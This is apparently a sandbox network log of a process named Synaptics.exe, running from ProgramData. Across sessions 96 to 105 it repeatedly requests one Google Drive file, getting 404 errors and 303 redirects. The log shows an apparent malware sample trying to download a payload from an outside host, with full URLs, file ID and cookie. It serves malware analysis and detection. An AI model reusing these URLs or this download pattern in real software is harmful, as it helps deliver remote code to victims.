2024-12-30 10:23:32 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.5 | 49950 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:33 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:33 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC6WLcS0ld8Wbl-pvK-Of99jMkw-S8PkJqPMC-fJgoCWFNBnzpaPpGMnw7c9ZGc6Z9JT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:33 GMT
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-WF6MBzeexB25fcpvlSVXSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
2024-12-30 10:23:33 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:23:33 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="GBqspq_ADivML3TvJZP35A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:23:33 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.2.5 | 49949 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:33 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:33 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:33 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-HA0NH9Ft22REyZjOynOXVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
98 | 192.168.2.5 | 49951 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:33 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:34 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:33 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-7ig5-VfRnvnHzboQSZBNeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      99 | 192.168.2.5 | 49959 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:34 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:34 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC54S44jTpunVyL1JvdIZcMCDlQ96wc37R4z45DYbxl2xjECfjVKCLBLjEpExgy92w3K
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:34 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-_ke4b_5EzedudC5u9u1axg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:34 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:34 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="IspZcspPMaMa3M2RT60v6w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                      2024-12-30 10:23:34 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      100 | 192.168.2.5 | 49960 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:34 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:34 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:34 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-0GBu6YxR8QF1rTZD_Dpn_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      101 | 192.168.2.5 | 49965 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:34 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:35 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC7ibPmzOI1Lii0TxKIZx3GBxaI2KXhUOn74MPldB8H2GXMefFtQh8NytzOidJH7jkGT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:34 GMT
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-xpP2zZ-6zwRAmLyEzrh1CA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:35 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:35 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="YHXJaCfUXwysDRMjg2WmNg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                      2024-12-30 10:23:35 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      102 | 192.168.2.5 | 49966 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:34 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:35 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:34 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-D6hZ6RuMGu6o7xGCGhaY5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
103 | 192.168.2.5 | 49973 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:35 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:36 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC50k40grudO0XMsDfqpLCiiqFXU8d3mLVHX4IKPEBh9vlC7ehNdzkLwSz7Lo0YEXWGueZEhfTg
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:35 GMT
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-SRHZKpJusfQ3tOce-mYiEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
2024-12-30 10:23:36 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:23:36 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="2sX1_UiKoKbuZDWnzaBeOg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:23:36 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
104 | 192.168.2.5 | 49972 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:35 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:35 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:35 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-gKMn-aRIJQ69lQeHyjWAvw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
105 | 192.168.2.5 | 49974 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:35 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:36 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
